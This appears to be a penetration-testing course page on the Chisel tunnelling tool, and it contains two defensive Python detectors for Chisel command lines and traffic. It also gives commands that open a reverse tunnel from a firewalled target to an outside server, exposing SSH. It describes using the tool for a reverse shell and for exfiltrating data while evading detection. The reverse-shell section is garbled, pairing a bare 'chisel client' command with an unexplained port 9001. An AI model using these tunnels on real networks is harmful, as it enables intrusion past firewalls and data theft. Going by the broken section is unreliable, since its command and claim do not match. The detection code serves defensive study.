# Course #56: Chisel
## Section 1: Introduction to Chisel
Chisel is a unique tool designed for penetration testers and security professionals who need to facilitate network communication and bypass firewall restrictions. It operates as a fast TCP tunnel over HTTP or HTTPS. This section delves into the installation, configuration, and real-world applications of Chisel on Kali Linux, providing a comprehensive guide for advanced users.
### 1.1 Installation and Configuration on Kali Linux
#### Prerequisites
Before installing Chisel, ensure that your Kali Linux system is up to date. Open your terminal and run the following commands:
```bash
sudo apt update
sudo apt upgrade -y
```
#### Installation
Chisel can be installed from the official GitHub repository. To do this, follow these steps:
1. **Install Go**: Chisel is written in Go, so we need to install Go first. Use the following command to install Go:
   ```bash
   sudo apt install golang -y
   ```
2. **Clone the Chisel Repository**: Use Git to clone the Chisel repository.
   ```bash
   git clone https://github.com/jpillora/chisel.git
   ```
3. **Build Chisel**: Navigate to the cloned directory and build the binary.
   ```bash
   cd chisel
   go build
   ```
4. **Move the Binary into Your PATH**: It’s best to move the binary to a directory that is included in your `$PATH`.
   ```bash
   sudo mv chisel /usr/local/bin/
   ```
5. **Verify Installation**: You can check if Chisel is installed correctly by running:
   ```bash
   chisel --version
   ```
You should see the version information of Chisel if the installation was successful.
#### Configuration
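Chisel doesn’t require extensive configuration, but understanding the command options is essential for effective deployment. The basic syntax for starting a Chisel server is:
```bash
chisel server -p <port>
```
And to start a client connection, you would use:
```bash
chisel client <server-address>:<port> <remote>
```
Here `<port>`, `<server-address>` and `<remote>` are placeholders for your own values.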
### 1.2 Step-by-Step Usage
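#### 1.2.1 Starting a Chisel Server
To start a Chisel server, use the following command:
```bash
chisel server -p 8080 --reverse
```
This command starts the Chisel server on port 8080. The `--reverse` flag allows clients to request reverse tunnels (`R:` remotes), which the client command in the next step relies on; without it the server rejects them. You will see logs indicating that the server is running and listening for incoming connections.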
#### 1.2.2 Starting a Client Session
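On the client machine, you can connect to the Chisel server. Use the command:
```bash
chisel client <server-ip>:8080 R:8081:localhost:80
```
In this command:
- `<server-ip>:8080`: The address and port of the Chisel server (`<server-ip>` is a placeholder).
- `R:8081:localhost:80`: This creates a reverse tunnel from port 8081 on the server to port 80 on the client.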
#### 1.2.3 Accessing Services Through the Tunnel
Once the tunnel is established, you can access services running on the client machine through the tunnel. For instance, if you have a web server running on the client machine on port 80, you can access it via:
```text
http://<server-ip>:8081
```
#### 1.2.4 Use Case: Bypassing Firewall Restrictions
A common scenario for using Chisel is bypassing restrictive firewalls. For instance, if you are in a corporate network that blocks SSH, you can use Chisel to tunnel SSH traffic over HTTP:
1. Start the Chisel server on a remote server that you control (`--reverse` permits the reverse remote used in step 2).
   ```bash
   chisel server -p 8080 --reverse
   ```
2. From the target machine (behind the firewall), run:
   ```bash
   chisel client <server-ip>:8080 R:2222:localhost:22
   ```
3. Now, you can SSH into the target machine via the Chisel tunnel:
   ```bash
   ssh -p 2222 user@<server-ip>
   ```
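The remote specifications used in 1.2.2 and 1.2.4 (`R:8081:localhost:80`, `R:2222:localhost:22`) say exactly which side opens a listening port and where traffic ends up, which is what a defender needs when such a command line appears in process-creation logs. The following is an added example, not code from the Chisel project: it decodes the four-part and `R:`-prefixed forms shown on this page (other shorthand forms are ignored), assumes the documented default of listening on all interfaces when no listen host is given, and runs over constructed command lines.

```python
import shlex
from dataclasses import dataclass
from typing import List, Optional

@dataclass
class Remote:
    reverse: bool      # True when the spec starts with "R:"
    listen_host: str   # interface the listening socket binds to
    listen_port: int
    target_host: str   # destination dialled at the far end of the tunnel
    target_port: int

def parse_remote(spec: str) -> Optional[Remote]:
    """Decode [R:][listen-host:]listen-port:target-host:target-port."""
    reverse = spec.startswith("R:")
    parts = (spec[2:] if reverse else spec).split(":")
    if len(parts) == 3:
        parts.insert(0, "0.0.0.0")  # assumption: no listen host means all interfaces
    if len(parts) != 4 or not (parts[1].isdecimal() and parts[3].isdecimal()):
        return None  # server address, flag value or an unsupported shorthand
    return Remote(reverse, parts[0], int(parts[1]), parts[2], int(parts[3]))

def triage(cmdline: str) -> List[Remote]:
    """Return the remotes of a `client` invocation; the binary name is not checked."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return []
    if "client" not in argv[1:2]:
        return []
    return [r for r in map(parse_remote, argv[2:]) if r is not None]

def describe(r: Remote) -> str:
    near, far = ("server", "client") if r.reverse else ("client", "server")
    return (f"{near} listens on {r.listen_host}:{r.listen_port}, "
            f"{far} connects to {r.target_host}:{r.target_port}")

# Constructed process-creation command lines (not captured data).
SAMPLE_CMDLINES = [
    "/usr/local/bin/chisel client 203.0.113.10:8080 R:2222:localhost:22",
    "/opt/tools/tunnel client 203.0.113.10:8080 R:8081:localhost:80",
    "/usr/bin/ssh -p 2222 user@203.0.113.10",
    "/usr/local/bin/chisel server -p 8080",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        for remote in triage(line):
            print(f"{line}\n  -> {describe(remote)}")
```

Matching on the argument shape rather than the executable name keeps the check working when the binary is installed under a different name.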
### 1.3 Detailed Technical Explanations
Chisel operates by creating TCP tunnels through HTTP/HTTPS. This enables penetration testers to circumvent firewall rules that typically block direct access to certain services. Its architecture leverages the simplicity of HTTP to traverse networks that may be heavily monitored or restricted.
#### How Tunneling Works in Chisel
Chisel utilizes a client-server model where:
- **Server**: Listens for incoming connections and creates a listening port that can forward requests to specific local services.
- **Client**: Initiates a connection to the server and sets up the forwarding as instructed.
The dynamics of tunneling can be illustrated as follows:
1. **Establishing the Connection**: The client sends a connection request to the server.
2. **Creating a Tunnel**: Upon a successful connection, the server opens a listening socket that maps to the client’s specified local service.
3. **Forwarding Requests**: As requests hit the server on the specified port, they are forwarded through the tunnel to the local service, and responses are relayed back to the client.
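Because the connection in step 1 starts as an ordinary HTTP request, it can be inspected like any other web traffic. The following added example (not part of the original course or of the Chisel project) flags request heads that ask for a WebSocket upgrade and offer a subprotocol beginning with `chisel-`; that token (`chisel-v3` in the public source at the time of writing) is an assumption to verify against the version you are hunting, and the request heads are constructed samples.

```python
from typing import Dict, List, Tuple

def parse_head(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP/1.1 request head into request line and lower-cased headers."""
    lines = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def tunnel_subprotocol(raw: bytes) -> str:
    """Return the offered chisel subprotocol token, or "" if none is offered."""
    _, h = parse_head(raw)
    if h.get("upgrade", "").lower() != "websocket":
        return ""
    for token in h.get("sec-websocket-protocol", "").split(","):
        if token.strip().lower().startswith("chisel-"):  # assumed token prefix
            return token.strip()
    return ""

def findings(requests: List[Tuple[str, bytes]]) -> List[Tuple[str, str, str]]:
    """(source IP, Host header, subprotocol) for every matching request."""
    out = []
    for src, raw in requests:
        proto = tunnel_subprotocol(raw)
        if proto:
            out.append((src, parse_head(raw)[1].get("host", ""), proto))
    return out

# Constructed request heads, as a proxy log or pcap export might yield them.
SAMPLE_REQUESTS = [
    ("10.1.2.30", b"GET / HTTP/1.1\r\nHost: 203.0.113.10:8080\r\nUpgrade: websocket\r\n"
                  b"Connection: Upgrade\r\nSec-WebSocket-Version: 13\r\n"
                  b"Sec-WebSocket-Protocol: chisel-v3\r\n\r\n"),
    ("10.1.2.31", b"GET /chat HTTP/1.1\r\nHost: chat.example.com\r\nUpgrade: websocket\r\n"
                  b"Connection: Upgrade\r\nSec-WebSocket-Protocol: graphql-ws\r\n\r\n"),
    ("10.1.2.32", b"GET /index.html HTTP/1.1\r\nHost: intranet.example.com\r\n\r\n"),
]

if __name__ == "__main__":
    for src, host, proto in findings(SAMPLE_REQUESTS):
        print(f"{src} -> {host}: WebSocket upgrade offering {proto}")
```

When the tunnel runs over HTTPS these headers are only visible at a point where TLS is inspected.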
### 1.4 Real-World Use Cases
#### 1.4.1 Remote Command Execution
Chisel can be a powerful tool in scenarios where remote command execution is achieved. For instance, if you gain access to a web server, you can use Chisel to create a reverse shell:
```bash
chisel client
```
Now, listening on port 9001, you can connect back and run commands remotely.
#### 1.4.2 Data Exfiltration
Using Chisel, sensitive data can be exfiltrated from a target network. Establish a tunnel to your server and securely transfer files using the tunnel you created, thus evading detection by security systems.
### 1.5 External References
For further exploration of Chisel and its capabilities, consider the following references:
- [Chisel GitHub Repository](https://github.com/jpillora/chisel)
- [Understanding Tunneling Protocols](https://www.cio.com/article/243046/tunneling-protocols.html)
- [Bypassing Firewalls with Proxies and Tunnels](https://www.sans.org/white-papers/40487/)
By utilizing these resources, you can deepen your understanding of the inner workings of Chisel and other related networking concepts.
### 1.6 Conclusion
Chisel offers a robust solution for penetration testers facing restrictive network environments. Its ease of use, combined with powerful tunneling capabilities, makes it an essential tool in the ethical hacker's arsenal. As you advance through this course, you will discover more intricate uses of Chisel and how it can be adapted to various scenarios in penetration testing and network security.
—
Made by pablo rotem / פבלו רותם